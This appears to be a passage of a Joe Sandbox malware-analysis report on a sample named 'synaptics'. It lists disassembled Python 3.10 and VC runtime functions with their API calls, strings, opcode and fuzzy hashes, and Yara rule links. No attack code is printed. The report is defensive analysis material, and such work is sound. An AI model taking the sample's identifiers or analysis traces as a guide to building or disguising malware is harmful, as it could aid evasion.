                                                                                                                                                                                                      • String ID: @xJlr$encoding problem: %s$encoding problem: %s with BOM$utf-8
                                                                                                                                                                                                      • API String ID: 0-3455258047
                                                                                                                                                                                                      • Opcode ID: 2249ff23bf005d3e91fd126f00e03a3c62808aaf74862ddfbe0c2921e75b354d
                                                                                                                                                                                                      • Instruction ID: dca74bcc3c9466acd6b7d3c0837188f967d801167087397addeeb93b1cef4dba
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2249ff23bf005d3e91fd126f00e03a3c62808aaf74862ddfbe0c2921e75b354d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2341EB3170910416DB10DE2EA8A5FE5BFA5DBC622FF5841BAEC5DCBB12D613C44B8293
                                                                                                                                                                                                      Function 73A83F30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 73A83EE0: __telemetry_main_return_trigger.VCRUNTIME140(?,?,?,?,73A83F62,?,?,?), ref: 73A83EFE
                                                                                                                                                                                                        • Part of subcall function 73A83EE0: __telemetry_main_return_trigger.VCRUNTIME140(?,?,?,?,73A83F62,?,?,?), ref: 73A83F19
                                                                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 73A83F65
                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 73A8401E
                                                                                                                                                                                                      • __telemetry_main_return_trigger.VCRUNTIME140(?,00000001), ref: 73A84037
                                                                                                                                                                                                      • __DestructExceptionObject.VCRUNTIME140 ref: 73A8403D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __telemetry_main_return_trigger$CurrentDestructExceptionImageNonwritableObject___except_validate_context_record
                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                      • API String ID: 111769499-1018135373
                                                                                                                                                                                                      • Opcode ID: 4bfcdbe28db38f9e1cef2428f31b4f8f591dc22055c15bb1b1c8f498b78295c4
                                                                                                                                                                                                      • Instruction ID: 3c1a4b982b66eaea84097321841201af31ffc02acef694ca7a0b7ddd93ed6d3d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4bfcdbe28db38f9e1cef2428f31b4f8f591dc22055c15bb1b1c8f498b78295c4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD41AF38A002099FCB02DF58C842AEEBBB9FF48314F14805AEC159B398D7369D15CB91
                                                                                                                                                                                                      Function 6C466930 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73C9A8,00000000,00000000,00000000,00000000,?,?), ref: 6C466971
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Negative size passed to PyBytes_FromStringAndSize, xrefs: 6C46695C
                                                                                                                                                                                                      • bytes must be in range(0, 256), xrefs: 6C466A11
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Object
                                                                                                                                                                                                      • String ID: Negative size passed to PyBytes_FromStringAndSize$bytes must be in range(0, 256)
                                                                                                                                                                                                      • API String ID: 1617383179-316428022
                                                                                                                                                                                                      • Opcode ID: b3fa6e11dcce2bda06869a284341e3ee35c12f6b125b51675de997a67c172423
                                                                                                                                                                                                      • Instruction ID: b7eb3ab059f200ceac186ce0df5a4f258c73ca55645ed94de6e2de68deb25c70
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3fa6e11dcce2bda06869a284341e3ee35c12f6b125b51675de997a67c172423
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7031E4727443004BD600CAA6DC81F9673A5EB8533AF14427DED18CBF85D771EC1A86D2
                                                                                                                                                                                                      Function 6C473EA0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\dictobject.c,000006C9), ref: 6C473ECF
                                                                                                                                                                                                      • PyObject_Hash.PYTHON310(?), ref: 6C473EE5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • D:\a\1\s\Objects\dictobject.c, xrefs: 6C473EBE
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C473EC3
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_FormatHashObject_
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\dictobject.c
                                                                                                                                                                                                      • API String ID: 896634218-1848062838
                                                                                                                                                                                                      • Opcode ID: 39d3be96b5fd1a75cb7df9db9425034d72976ef777ef69d9b07224e86855e048
                                                                                                                                                                                                      • Instruction ID: 1d21ee932f418ae7535b8cc3e06be7541cdc3a2ab7b32be44aed392c8d67fbca
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39d3be96b5fd1a75cb7df9db9425034d72976ef777ef69d9b07224e86855e048
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB31F4727001046FDB20CA69DC44FDA73B9DB85279B104759F82C87BA1E731E95687E1
                                                                                                                                                                                                      Function 6C475C10 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyList_New.PYTHON310(?,?,?,?,?,6C4757A6,?), ref: 6C475C35
                                                                                                                                                                                                      • PyList_New.PYTHON310(?), ref: 6C475C5D
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\dictobject.c,00000B27,?,?,?,6C4757A6,?), ref: 6C475D16
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • D:\a\1\s\Objects\dictobject.c, xrefs: 6C475D05
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C475D0A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: List_$Err_Format
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\dictobject.c
                                                                                                                                                                                                      • API String ID: 817396481-1848062838
                                                                                                                                                                                                      • Opcode ID: 28ec926a995e8b56a523d65683e292eeeb97de86953987f84c31c98c9f7b4ba4
                                                                                                                                                                                                      • Instruction ID: 987ea010b4baa7a56d8a3a08d18f2340c78471bc07fbc691edc7bce35560af87
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28ec926a995e8b56a523d65683e292eeeb97de86953987f84c31c98c9f7b4ba4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8131F4726015029FD714CF59D880F99B3A5FF85314F14427AD8198BB51EB30E951C7E0
                                                                                                                                                                                                      Function 6C577E00 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(00000000,6C73BD78,input too long), ref: 6C577E3C
                                                                                                                                                                                                      • PyUnicode_FromString.PYTHON310(?), ref: 6C577E64
                                                                                                                                                                                                      • PyImport_Import.PYTHON310(00000000), ref: 6C577E8D
                                                                                                                                                                                                        • Part of subcall function 6C577830: _PyUnicode_FromId.PYTHON310(6C74DF2C,00000000,00000000,?,?,?,?,?,6C44F6BD,00000000), ref: 6C57784B
                                                                                                                                                                                                        • Part of subcall function 6C577830: _PyUnicode_FromId.PYTHON310(6C74DF4C,?,?,?,?,?,6C44F6BD,00000000), ref: 6C577863
                                                                                                                                                                                                        • Part of subcall function 6C577830: PyList_New.PYTHON310(00000000,?,?,?,?,?,?,6C44F6BD,00000000), ref: 6C577879
                                                                                                                                                                                                      • PyObject_GetAttr.PYTHON310(00000000,00000000), ref: 6C577EA3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FromUnicode_$String$AttrErr_ImportImport_List_Object_
                                                                                                                                                                                                      • String ID: input too long
                                                                                                                                                                                                      • API String ID: 1404053493-2786935005
                                                                                                                                                                                                      • Opcode ID: 9e86cfec5a9ae05e7f9847f15e494a1fa71eb7e57c6536397f3a48d115d11af9
                                                                                                                                                                                                      • Instruction ID: 2fc08e8ff95c790fc9c44c2c9aeaf4e96f5101d66fad72d6f67f59fcdb02b8d5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e86cfec5a9ae05e7f9847f15e494a1fa71eb7e57c6536397f3a48d115d11af9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7210572A442015BC3218AB9BC41A86B3E8DB81378F144778ED68877D0EA35ED56C7E1
                                                                                                                                                                                                      Function 6C4A3C00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(__dict__ must be set to a dictionary, not a '%.200s',?), ref: 6C4A3C71
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_Clear.PYTHON310(?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B62
                                                                                                                                                                                                        • Part of subcall function 6C566B50: PyUnicode_FromFormatV.PYTHON310(?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B6C
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_SetObject.PYTHON310(?,?,00000000,?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B78
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73EC20,00000000,00000000,00000000,00000000), ref: 6C4A3CCD
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • This object has no __dict__, xrefs: 6C4A3CB2
                                                                                                                                                                                                      • cannot delete __dict__, xrefs: 6C4A3C50
                                                                                                                                                                                                      • __dict__ must be set to a dictionary, not a '%.200s', xrefs: 6C4A3C66
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$FormatObject$ClearFromUnicode_
                                                                                                                                                                                                      • String ID: This object has no __dict__$__dict__ must be set to a dictionary, not a '%.200s'$cannot delete __dict__
                                                                                                                                                                                                      • API String ID: 2516271747-1909749307
                                                                                                                                                                                                      • Opcode ID: e12980de8d71d51166903880a4019326ec00c9083a4a19a014fd6942ca1a6f46
                                                                                                                                                                                                      • Instruction ID: 5d1ca78a817d215887c6760bd4bf84657a00dec4ed8a60e1bdeb38a69ab6d9fc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e12980de8d71d51166903880a4019326ec00c9083a4a19a014fd6942ca1a6f46
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F31E472B40101ABD714CEA9DC41F917365EBA133AF144369E9288B7D5E722EC038790
                                                                                                                                                                                                      Function 6C4519A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,null argument to internal routine), ref: 6C4519C7
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • '%.200s' object can't be repeated, xrefs: 6C451A69
                                                                                                                                                                                                      • null argument to internal routine, xrefs: 6C4519BB
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$ObjectString
                                                                                                                                                                                                      • String ID: '%.200s' object can't be repeated$null argument to internal routine
                                                                                                                                                                                                      • API String ID: 1622067708-1106208759
                                                                                                                                                                                                      • Opcode ID: 702cd5910f945b0bcbf14f4eacbc05504a023b3936cc13a8e9ca00a8208209b7
                                                                                                                                                                                                      • Instruction ID: 28ae4fe9e8cc19d1f06edb1b118afe9f24adcddf0db2e20ab262ded410928391
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 702cd5910f945b0bcbf14f4eacbc05504a023b3936cc13a8e9ca00a8208209b7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6821073B7001009BEB01CE95EC80E96B3A5EF8023EB548239E91C8BB61D735DC66C790
                                                                                                                                                                                                      Function 6C475D30 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyList_New.PYTHON310(?), ref: 6C475D54
                                                                                                                                                                                                      • PyList_New.PYTHON310(?), ref: 6C475D7C
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\dictobject.c,00000B31), ref: 6C475E1B
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • D:\a\1\s\Objects\dictobject.c, xrefs: 6C475E0A
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C475E0F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: List_$Err_Format
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\dictobject.c
                                                                                                                                                                                                      • API String ID: 817396481-1848062838
                                                                                                                                                                                                      • Opcode ID: 6b454a9fcad8301c3cc5713c02d1370ec902487952bf0c9c5fcadf42aa545edb
                                                                                                                                                                                                      • Instruction ID: 6c81771f6d4875a536c8a5d56b77076091a3971b96865d26142a7813eea32cf4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b454a9fcad8301c3cc5713c02d1370ec902487952bf0c9c5fcadf42aa545edb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B721C3323055019BEB14CB99D980F9AB3A6EF85315B148536E9188BB51D735F852C7E0
                                                                                                                                                                                                      Function 6C5B1920 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyUnicode_DecodeFSDefaultAndSize.PYTHON310(?,?), ref: 6C5B193F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DecodeDefaultSizeUnicode_
                                                                                                                                                                                                      • String ID: compile
                                                                                                                                                                                                      • API String ID: 1639845607-1738237498
                                                                                                                                                                                                      • Opcode ID: 70f6c7f7d8dcb2c9cb250da9402c282035c09af6052efd7ab494d5e588ea7f78
                                                                                                                                                                                                      • Instruction ID: 27460160fd5e357a41baab773f988229966d8c638bd6719ec1b6d459a31dfe95
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70f6c7f7d8dcb2c9cb250da9402c282035c09af6052efd7ab494d5e588ea7f78
